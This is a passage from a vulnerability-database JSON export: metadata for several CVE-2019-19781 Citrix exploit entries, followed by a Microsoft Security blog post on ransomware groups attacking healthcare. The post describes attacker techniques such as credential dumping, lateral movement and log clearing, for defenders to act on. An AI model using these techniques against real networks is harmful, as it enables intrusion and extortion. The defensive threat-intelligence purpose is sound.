"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-21T15:20:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-02T08:18:59", "id": "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:53:52", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-21T23:13:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-20T11:41:58", "id": "1AB95B23-4916-5338-9CB0-28672888287F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-06T06:34:39", "description": "# CVE-2019-19781\n\nSimple POC to test if your Citrix ADC Netscale...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-30T17:37:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-06T03:45:44", "id": "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:24", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T20:43:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-19T06:52:48", "id": "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:27:24", "description": "# Citrix Analysis Notebook\n\nA jupyter notebook to aid in automat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T04:59:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-02-21T02:51:51", "id": "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "href": "", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:27:58", "description": "- [CVE-2019-19781 DFIR notes](https://github.com/x1sec/CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-12T23:13:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-10-27T02:49:53", "id": "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:40:41", "description": "# CVE-2019-19781-exploit\nCVE-201...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2021-09-27T02:23:02", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-07T17:52:31", "id": "09DFDAA9-9EF6-513F-B464-D707B45D598A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. 
However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. 
Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. 
They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. 
On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. 
RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. 
These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deployed the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. 
Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. 
REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. 
Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. 
Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic, behavior-based hunting where possible, and on hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. 
[Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. 
Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. 
Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assessments to measure security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. 
And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protection (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. 
On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust 
Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 